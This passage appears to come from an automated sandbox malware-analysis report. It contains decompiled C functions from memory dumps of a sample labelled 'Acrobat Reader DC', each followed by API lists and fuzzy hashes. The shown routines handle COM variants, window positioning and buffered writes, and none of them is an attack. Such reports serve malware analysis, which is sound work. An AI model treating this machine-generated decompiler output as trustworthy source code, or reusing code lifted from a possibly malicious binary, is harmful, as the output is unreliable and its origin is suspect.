                                  										 *((intOrPtr*)( *((intOrPtr*)( *_t169 + 0x4c))))(_t169, _v12);
                                  										E00430EAD( &_a4);
                                  										return _t308;
                                  									}
                                  								} else {
                                  									_t177 = _a4;
                                  									_t313 = 0;
                                  									_v16 = 0;
                                  									_t179 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x1c))))(_t177, _t306,  &_v16, 1,  &_v24);
                                  									__eflags = _t179;
                                  									if(_t179 < 0) {
                                  										_t288 = _v12;
                                  										__eflags = 0 -  *((intOrPtr*)(_t288 + 0x2c));
                                  										if(0 >=  *((intOrPtr*)(_t288 + 0x2c))) {
                                  											L30:
                                  											_t150 = _a4;
                                  											 *((intOrPtr*)( *((intOrPtr*)( *_t150 + 0x4c))))(_t150, _v12);
                                  											_t153 = _v8;
                                  											_t307 = 0;
                                  											__eflags = _t153;
                                  											if(_t153 == 0) {
                                  												goto L8;
                                  											} else {
                                  												_t231 =  *(_t153 + 0x18) & 0x0000ffff;
                                  												__eflags = _t231 - 0x20;
                                  												if(_t231 <= 0x20) {
                                  													 *_t218 = 1;
                                  													_v16 = 0;
                                  													__eflags = 0 - _t231;
                                  													if(0 < _t231) {
                                  														_t104 =  &(_t218[4]); // 0x47984c
                                  														_t312 = _t104;
                                  														do {
                                  															_t237 =  *((intOrPtr*)(_t153 + 8));
                                  															_t274 =  *(_t237 + _t307 + 4) & 0x0000ffff;
                                  															_t238 = _t237 + _t307;
                                  															 *_t312 = _t274;
                                  															__eflags = _t274 - 0x1a;
                                  															if(_t274 == 0x1a) {
                                  																_t220 = 0x00004000 |  *( *_t238 + 4);
                                  																__eflags = _t220;
                                  																 *_t312 = _t220;
                                  																_t218 = _a16;
                                  															}
                                  															__eflags =  *_t312 - 0x1b;
                                  															if( *_t312 == 0x1b) {
                                  																_t222 = 0x00002000 |  *( *_t238 + 4);
                                  																__eflags = _t222;
                                  																 *_t312 = _t222;
                                  																_t218 = _a16;
                                  															}
                                  															__eflags =  *_t312 - 0x1d;
                                  															if( *_t312 == 0x1d) {
                                  																 *_t312 = E0044A545(_a4, _t312, _a4,  *_t238);
                                  																_t153 = _v8;
                                  																_t315 = _t315 + 8;
                                  															}
                                  															_t312[0] =  *((intOrPtr*)( *((intOrPtr*)(_t153 + 8)) + _t307 + 0xc));
                                  															_t241 =  &(_v16[0]);
                                  															_t307 = _t307 + 0x10;
                                  															_t312 =  &(_t312[1]);
                                  															_v16 = _t241;
                                  															__eflags = _t241 -  *(_t153 + 0x18);
                                  														} while (_t241 <  *(_t153 + 0x18));
                                  													}
                                  													_t232 =  *(_t153 + 0x24) & 0x0000ffff;
                                  													_t271 = _t232 - 0x16;
                                  													__eflags = _t271 - 3;
                                  													if(_t271 <= 3) {
                                  														switch( *((intOrPtr*)(_t271 * 4 +  &M0045212B))) {
                                  															case 0:
                                  																_t232 = 3;
                                  																goto L48;
                                  															case 1:
                                  																__ecx = 0x13;
                                  																goto L48;
                                  															case 2:
                                  																__ecx = 0;
                                  																goto L48;
                                  															case 3:
                                  																__ecx = 0xa;
                                  																goto L48;
                                  														}
                                  													}
                                  													L48:
                                  													_t218[3] = _t232;
                                  													_t218[1] =  *(_t153 + 0x10);
                                  													_t218[3] =  *(_t153 + 0x18);
                                  													_t235 = _a4;
                                  													_t218[2] =  *(_t153 + 0x14);
                                  													 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x50))))(_t235, _t153);
                                  													E00430EAD( &_a4);
                                  													__eflags = 0;
                                  													return 0;
                                  												} else {
                                  													_t243 = _a4;
                                  													 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 0x50))))(_t243, _t153);
                                  													E00430EAD( &_a4);
                                  													return 0x80004005;
                                  												}
                                  											}
                                  										} else {
                                  											while(1) {
                                  												_t180 = _a4;
                                  												_t309 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x14))))(_t180, _t313 & 0x0000ffff,  &_v8);
                                  												_t183 = _a4;
                                  												_t252 =  *_t183;
                                  												__eflags = _t309;
                                  												if(_t309 < 0) {
                                  													break;
                                  												}
                                  												 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x30))))(_t183,  *_v8,  &_v16, 0, 0, 0);
                                  												_t254 = _v8;
                                  												__eflags =  *(_t254 + 0x10) & 0x00000003;
                                  												if(( *(_t254 + 0x10) & 0x00000003) == 0) {
                                  													L26:
                                  													__imp__#6(_v16);
                                  													_t190 = _a4;
                                  													 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 0x50))))(_t190, _v8);
                                  													_t192 = _v12;
                                  													_t313 = 1 + _t313;
                                  													_v8 = 0;
                                  													__eflags = _t313 -  *((intOrPtr*)(_t192 + 0x2c));
                                  													if(_t313 <  *((intOrPtr*)(_t192 + 0x2c))) {
                                  														continue;
                                  													} else {
                                  														goto L30;
                                  													}
                                  												} else {
                                  													_t194 = lstrcmpiW(_v16, _a12);
                                  													__eflags = _t194;
                                  													if(_t194 == 0) {
                                  														__imp__#6(_v16);
                                  														goto L30;
                                  													} else {
                                  														goto L26;
                                  													}
                                  												}
                                  												goto L51;
                                  											}
                                  											 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x4c))))(_t183, _v12);
                                  											E00430EAD( &_a4);
                                  											return _t309;
                                  										}
                                  									} else {
                                  										__imp__#6(_v16);
                                  										_v20 = _t306;
                                  										goto L15;
                                  									}
                                  								}
                                  							} else {
                                  								__eflags =  *(_t227 + 0x36) & 0x00000040;
                                  								if(( *(_t227 + 0x36) & 0x00000040) == 0) {
                                  									goto L12;
                                  								} else {
                                  									_t195 = _a4;
                                  									 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 0x4c))))(_t195, _t227);
                                  									_t198 = _a4;
                                  									_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t198 + 0x20))))(_t198, 0xffffffff,  &_v24);
                                  									__eflags = _t200;
                                  									if(_t200 < 0) {
                                  										L8:
                                  										E00430EAD( &_a4);
                                  										return 0x80004005;
                                  									} else {
                                  										_t201 = _a4;
                                  										_v16 = 0;
                                  										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t201 + 0x38))))(_t201, _v24,  &_v16);
                                  										if(__eflags >= 0) {
                                  											E00441E8D(__eflags,  &_a4,  &_v16);
                                  											_t205 = _a4;
                                  											_t314 =  *((intOrPtr*)( *((intOrPtr*)( *_t205 + 0xc))))(_t205,  &_v12);
                                  											__eflags = _t314;
                                  											if(_t314 >= 0) {
                                  												E00430EAD( &_v16);
                                  												goto L12;
                                  											} else {
                                  												E00430EAD( &_v16);
                                  												E00430EAD( &_a4);
                                  												return _t314;
                                  											}
                                  										} else {
                                  											E00430EAD( &_v16);
                                  											goto L8;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						E00430EAD( &_a4);
                                  						return 0x80004001;
                                  					}
                                  				} else {
                                  					L1:
                                  					E00430EAD( &_a4);
                                  					return _t310;
                                  				}
                                  				L51:
                                  			}





























































                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E00479500(short* __ecx, void* __fp0, char _a4, intOrPtr _a12) {
                                  				char _v28;
                                  				char _v52;
                                  				short* __edi;
                                  				char* __esi;
                                  				signed int _t32;
                                  				void* _t39;
                                  				void* _t46;
                                  				short* _t47;
                                  				void* _t50;
                                  
                                  				_t47 = __ecx;
                                  				__imp__#8(__ecx, _t46, _t50, _t39);
                                  				_t32 = _a12 - 1;
                                  				 *((intOrPtr*)(__ecx + 8)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xc)) = 0;
                                  				if(_t32 > 0xb) {
                                  					L17:
                                  					E00408F40(_t47,  &_a4);
                                  					return _t47;
                                  				} else {
                                  					switch( *((intOrPtr*)(_t32 * 4 +  &M004796E4))) {
                                  						case 0:
                                  							__eax = 3;
                                  							__ecx =  &_a4;
                                  							 *__edi = __ax;
                                  							__eax = E0040C650( &_a4);
                                  							goto L16;
                                  						case 1:
                                  							__eax =  &_a4;
                                  							__edx = 0x14;
                                  							 *__edi = __dx;
                                  							__eax = E00443006( &_a4);
                                  							 *((intOrPtr*)(__edi + 0xc)) = __edx;
                                  							goto L16;
                                  						case 2:
                                  							__ecx = 5;
                                  							 *__edi = __cx;
                                  							__ecx =  &_a4;
                                  							__eax = E0040BAA0( &_a4);
                                  							 *((long long*)(__edi + 8)) = __fp0;
                                  							__esi =  &_a4;
                                  							E00408F40(__edi,  &_a4) = __edi;
                                  							_pop(__edi);
                                  							_pop(__esi);
                                  							_pop(__ebx);
                                  							return __edi;
                                  							goto L18;
                                  						case 3:
                                  							__ecx =  &_a4;
                                  							__eax = 8;
                                  							 *__edi = __ax;
                                  							__eax = E0045340C( &_a4);
                                  							_push(__eax);
                                  							__imp__#2();
                                  							goto L16;
                                  						case 4:
                                  							__esp = __esp - 0x10;
                                  							__edx = 0x200c;
                                  							__eax =  &_a4;
                                  							__ebx = __esp;
                                  							 *__edi = __dx;
                                  							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
                                  							__eax = E00479362(__eflags, __fp0);
                                  							goto L16;
                                  						case 5:
                                  							__eax =  &_a4;
                                  							__eax = E00432508( &_a4);
                                  							__esp = __esp - 0x10;
                                  							__ebx = __esp;
                                  							__eax = E0040B960(__eax, __esp, __ecx, __edi);
                                  							__ecx =  &_v28;
                                  							E00479500( &_v28, __fp0) = E00437063(__edi, __eax);
                                  							__ecx =  &_v52;
                                  							_push( &_v52);
                                  							__imp__#9();
                                  							__esi =  &_a4;
                                  							E00408F40(__edi,  &_a4) = __edi;
                                  							_pop(__edi);
                                  							_pop(__esi);
                                  							_pop(__ebx);
                                  							return __edi;
                                  							goto L18;
                                  						case 6:
                                  							__edx =  &_a4;
                                  							__ecx = 0x13;
                                  							 *__edi = __cx;
                                  							__eax = E0044B3AC( &_a4);
                                  							goto L16;
                                  						case 7:
                                  							__eax = _a4;
                                  							__eflags = __eax;
                                  							if(__eax == 0) {
                                  								goto L17;
                                  							} else {
                                  								_push(__eax);
                                  								_push(__edi);
                                  								__imp__#10();
                                  								__esi =  &_a4;
                                  								E00408F40(__edi,  &_a4) = __edi;
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								_pop(__ebx);
                                  								return __edi;
                                  							}
                                  							goto L18;
                                  						case 8:
                                  							 *__ecx = 0xb;
                                  							 *((short*)(_t47 + 8)) = E00442F4C( &_a4) & 0x000000ff;
                                  							E00408F40(_t47,  &_a4);
                                  							return _t47;
                                  							goto L18;
                                  						case 9:
                                  							__edx =  &_a4;
                                  							__eax = E0044CECD( &_a4);
                                  							__eflags = __al;
                                  							if(__al == 0) {
                                  								goto L14;
                                  							} else {
                                  								__eax = 0xa;
                                  								__esi =  &_a4;
                                  								 *__edi = __ax;
                                  								 *((intOrPtr*)(__edi + 8)) = 0x80020004;
                                  								E00408F40(__edi,  &_a4) = __edi;
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								_pop(__ebx);
                                  								return __edi;
                                  							}
                                  							goto L18;
                                  						case 0xa:
                                  							L14:
                                  							__esp = __esp - 0x10;
                                  							__ecx = 0x2011;
                                  							__eax =  &_a4;
                                  							__ebx = __esp;
                                  							 *__edi = __cx;
                                  							__eax = E0040B960( &_a4, __esp, 0x2011, __edi);
                                  							__eax = E00473B76(__eflags);
                                  							goto L16;
                                  						case 0xb:
                                  							__esp = __esp - 0x10;
                                  							__edx = 0x2013;
                                  							__eax =  &_a4;
                                  							__ebx = __esp;
                                  							 *__edi = __dx;
                                  							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
                                  							__eax = E0044CE43(__ecx, __eflags);
                                  							L16:
                                  							 *((intOrPtr*)(__edi + 8)) = __eax;
                                  							goto L17;
                                  					}
                                  				}
                                  				L18:
                                  			}

                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyInitString
                                  • String ID:
                                  • API String ID: 2808897238-0
                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004499DB(void* __eflags, signed int _a4, signed int _a8, int _a12, int _a16, int _a20) {
                                  				struct tagPOINT _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				int _v24;
                                  				long _v28;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				struct HWND__* _t59;
                                  				int _t61;
                                  				int _t64;
                                  				intOrPtr _t69;
                                  				struct HWND__*** _t70;
                                  				struct HWND__** _t71;
                                  				struct HWND__** _t75;
                                  				int _t78;
                                  				int _t79;
                                  				intOrPtr _t83;
                                  				intOrPtr _t84;
                                  				struct tagRECT* _t85;
                                  				signed int _t86;
                                  				int _t87;
                                  				signed int _t88;
                                  				struct HWND__** _t91;
                                  				long _t95;
                                  				struct HWND__** _t104;
                                  				struct HWND__** _t107;
                                  
                                  				_t78 = _a8;
                                  				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_a4) != 0) {
                                  					_t83 =  *0x4a8690; // 0x0
                                  					_t57 = _a4;
                                  					_t84 =  *0x4a86a4; // 0xa51ad0
                                  					_t107 =  *( *(_t83 + _a8 * 4));
                                  					_t58 = _t57 | 0xffffffff;
                                  					_t104 =  *( *(_t84 + _t57 * 4));
                                  					__eflags = _t78 - _t58;
                                  					if(_t78 != _t58) {
                                  						L6:
                                  						_t59 =  *_t104;
                                  						_t85 =  &_v28;
                                  						_a8 = _t59;
                                  						GetWindowRect(_t59, _t85);
                                  						_t95 = _v28;
                                  						_t86 = _t85 | 0xffffffff;
                                  						__eflags = _a16 - _t86;
                                  						if(_a16 == _t86) {
                                  							_t75 = _v20 - _t95;
                                  							__eflags = _t75;
                                  							_a16 = _t75;
                                  						}
                                  						_t61 = _v24;
                                  						__eflags = _a20 - _t86;
                                  						if(_a20 == _t86) {
                                  							_t91 = _v16 - _t61;
                                  							__eflags = _t91;
                                  							_a20 = _t91;
                                  						}
                                  						_v12.x = _t95;
                                  						_v12.y = _t61;
                                  						ScreenToClient( *_t107,  &_v12);
                                  						__eflags = _t78 - 0xffffffff;
                                  						if(_t78 == 0xffffffff) {
                                  							_t78 = _v12.x;
                                  						}
                                  						_t64 = _a12;
                                  						__eflags = _t64 - 0xffffffff;
                                  						if(_t64 == 0xffffffff) {
                                  							_t64 = _v12.y;
                                  						}
                                  						_t87 = _a16;
                                  						_t107[0x16] = _t78;
                                  						_t107[0x17] = _t64;
                                  						_t107[0x18] = _t87;
                                  						_t107[0x19] = _a20;
                                  						__eflags = _t104[0x20] - _t78;
                                  						if(_t104[0x20] != _t78) {
                                  							L19:
                                  							_t79 = _a8;
                                  							MoveWindow(_t79, _t78, _t64, _t87, _a20, 1);
                                  							E0043028B(_t107, _t104, 1);
                                  							_t88 = 3;
                                  							__eflags = _t104[0x22] - 3;
                                  							if(_t104[0x22] == 3) {
                                  								_a20 = 3;
                                  								__eflags =  *0x4a86b4 - _t88; // 0x2
                                  								if(__eflags >= 0) {
                                  									do {
                                  										_t69 =  *0x4a86a4; // 0xa51ad0
                                  										_t70 =  *(_t69 + _t88 * 4);
                                  										__eflags =  *_t70;
                                  										if( *_t70 != 0) {
                                  											_t71 =  *_t70;
                                  											__eflags = _t71[1] - _t107[1];
                                  											if(_t71[1] == _t107[1]) {
                                  												__eflags = _t71[0x22] - 0x16;
                                  												if(_t71[0x22] == 0x16) {
                                  													__eflags = _t71[0xc] - _t79;
                                  													if(_t71[0xc] == _t79) {
                                  														SendMessageW( *_t71, 0x469, _t79, 0);
                                  														_t88 = _a20;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										_t88 = _t88 + 1;
                                  										_a20 = _t88;
                                  										__eflags = _t88 -  *0x4a86b4; // 0x2
                                  									} while (__eflags <= 0);
                                  								}
                                  							}
                                  							E00430B87(_t107, _t104, 1);
                                  						} else {
                                  							__eflags = _t104[0x20] - _t64;
                                  							if(_t104[0x20] != _t64) {
                                  								goto L19;
                                  							} else {
                                  								__eflags = _t104[0x21] - _t87;
                                  								if(_t104[0x21] != _t87) {
                                  									goto L19;
                                  								} else {
                                  									__eflags = _t104[0x21] - _a20;
                                  									if(_t104[0x21] != _a20) {
                                  										_t87 = _a16;
                                  										goto L19;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						__eflags = _a12 - _t58;
                                  						if(_a12 != _t58) {
                                  							goto L6;
                                  						} else {
                                  							__eflags = _a16 - _t58;
                                  							if(_a16 != _t58) {
                                  								goto L6;
                                  							} else {
                                  								__eflags = _a20 - _t58;
                                  								if(_a20 != _t58) {
                                  									goto L6;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					return 1;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • GetWindowRect.USER32 ref: 00449A4A
                                  • ScreenToClient.USER32 ref: 00449A80
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0041415F(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t56;
                                  				signed int _t60;
                                  				void* _t65;
                                  				signed int _t66;
                                  				signed int _t69;
                                  				signed int _t71;
                                  				signed int _t72;
                                  				signed int _t74;
                                  				signed int _t75;
                                  				signed int _t78;
                                  				signed int _t79;
                                  				signed int _t81;
                                  				signed int _t85;
                                  				signed int _t92;
                                  				signed int _t93;
                                  				signed int _t94;
                                  				signed int _t95;
                                  				intOrPtr* _t96;
                                  				void* _t97;
                                  
                                  				_t92 = _a8;
                                  				if(_t92 == 0 || _a12 == 0) {
                                  					L4:
                                  					return 0;
                                  				} else {
                                  					_t96 = _a16;
                                  					_t100 = _t96;
                                  					if(_t96 != 0) {
                                  						_t79 = _a4;
                                  						__eflags = _t79;
                                  						if(__eflags == 0) {
                                  							goto L3;
                                  						}
                                  						_t60 = _t56 | 0xffffffff;
                                  						_t88 = _t60 % _t92;
                                  						__eflags = _a12 - _t60 / _t92;
                                  						if(__eflags > 0) {
                                  							goto L3;
                                  						}
                                  						_t93 = _t92 * _a12;
                                  						__eflags =  *(_t96 + 0xc) & 0x0000010c;
                                  						_v8 = _t79;
                                  						_v16 = _t93;
                                  						_t78 = _t93;
                                  						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
                                  							_v12 = 0x1000;
                                  						} else {
                                  							_v12 =  *(_t96 + 0x18);
                                  						}
                                  						__eflags = _t93;
                                  						if(_t93 == 0) {
                                  							L32:
                                  							return _a12;
                                  						} else {
                                  							do {
                                  								_t81 =  *(_t96 + 0xc) & 0x00000108;
                                  								__eflags = _t81;
                                  								if(_t81 == 0) {
                                  									L18:
                                  									__eflags = _t78 - _v12;
                                  									if(_t78 < _v12) {
                                  										_t65 = E00418F98(_t88, _t93,  *_v8, _t96);
                                  										__eflags = _t65 - 0xffffffff;
                                  										if(_t65 == 0xffffffff) {
                                  											L34:
                                  											_t66 = _t93;
                                  											L35:
                                  											return (_t66 - _t78) / _a8;
                                  										}
                                  										_v8 = _v8 + 1;
                                  										_t69 =  *(_t96 + 0x18);
                                  										_t78 = _t78 - 1;
                                  										_v12 = _t69;
                                  										__eflags = _t69;
                                  										if(_t69 <= 0) {
                                  											_v12 = 1;
                                  										}
                                  										goto L31;
                                  									}
                                  									__eflags = _t81;
                                  									if(_t81 == 0) {
                                  										L21:
                                  										__eflags = _v12;
                                  										_t94 = _t78;
                                  										if(_v12 != 0) {
                                  											_t72 = _t78;
                                  											_t88 = _t72 % _v12;
                                  											_t94 = _t94 - _t72 % _v12;
                                  											__eflags = _t94;
                                  										}
                                  										_push(_t94);
                                  										_push(_v8);
                                  										_push(E00414139(_t96));
                                  										_t71 = E0041B7B2(_t78, _t88, _t94, _t96, __eflags);
                                  										_t97 = _t97 + 0xc;
                                  										__eflags = _t71 - 0xffffffff;
                                  										if(_t71 == 0xffffffff) {
                                  											L36:
                                  											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
                                  											_t66 = _v16;
                                  											goto L35;
                                  										} else {
                                  											_t85 = _t94;
                                  											__eflags = _t71 - _t94;
                                  											if(_t71 <= _t94) {
                                  												_t85 = _t71;
                                  											}
                                  											_v8 = _v8 + _t85;
                                  											_t78 = _t78 - _t85;
                                  											__eflags = _t71 - _t94;
                                  											if(_t71 < _t94) {
                                  												goto L36;
                                  											} else {
                                  												L27:
                                  												_t93 = _v16;
                                  												goto L31;
                                  											}
                                  										}
                                  									}
                                  									_t74 = E0041443C(_t88, _t96);
                                  									__eflags = _t74;
                                  									if(_t74 != 0) {
                                  										goto L34;
                                  									}
                                  									goto L21;
                                  								}
                                  								_t75 =  *(_t96 + 4);
                                  								__eflags = _t75;
                                  								if(__eflags == 0) {
                                  									goto L18;
                                  								}
                                  								if(__eflags < 0) {
                                  									_t45 = _t96 + 0xc;
                                  									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
                                  									__eflags =  *_t45;
                                  									goto L34;
                                  								}
                                  								_t95 = _t78;
                                  								__eflags = _t78 - _t75;
                                  								if(_t78 >= _t75) {
                                  									_t95 = _t75;
                                  								}
                                  								E00410E60( *_t96, _v8, _t95);
                                  								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
                                  								 *_t96 =  *_t96 + _t95;
                                  								_t97 = _t97 + 0xc;
                                  								_t78 = _t78 - _t95;
                                  								_v8 = _v8 + _t95;
                                  								goto L27;
                                  								L31:
                                  								__eflags = _t78;
                                  							} while (_t78 != 0);
                                  							goto L32;
                                  						}
                                  					}
                                  					L3:
                                  					 *((intOrPtr*)(E00417F77(_t100))) = 0x16;
                                  					E00417F25();
                                  					goto L4;
                                  				}
                                  			}






























                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00441672(signed int __eax, signed int* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				struct tagRECT _v36;
                                  				signed int _t38;
                                  				intOrPtr _t40;
                                  				signed int _t44;
                                  				intOrPtr _t45;
                                  				struct HWND__*** _t46;
                                  				struct HWND__** _t47;
                                  				intOrPtr* _t52;
                                  				intOrPtr _t54;
                                  				intOrPtr _t57;
                                  				signed int _t58;
                                  				signed char _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t68;
                                  				signed int _t76;
                                  				signed int _t80;
                                  				void* _t86;
                                  				void* _t96;
                                  
                                  				_t38 = __eax | 0xffffffff;
                                  				_v12 = _t38;
                                  				_v16 = _t38;
                                  				_t40 =  *0x4a8690; // 0x0
                                  				ClientToScreen( *( *( *(_t40 +  *_a4 * 4))),  &_a8);
                                  				_t54 =  *0x4a8694; // 0x0
                                  				_t80 = 0;
                                  				if(_t54 <= 0) {
                                  					L24:
                                  					_t44 = MessageBeep(0) | 0xffffffff;
                                  					goto L25;
                                  				} else {
                                  					do {
                                  						_t57 =  *0x4a8690; // 0x0
                                  						_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + _t80 * 4))));
                                  						_v20 = _t68;
                                  						if(_t68 == 0) {
                                  							goto L17;
                                  						} else {
                                  							_t76 = 3;
                                  							_t86 =  *0x4a86b4 - _t76; // 0x2
                                  							if(_t86 < 0) {
                                  								goto L17;
                                  							} else {
                                  								while(1) {
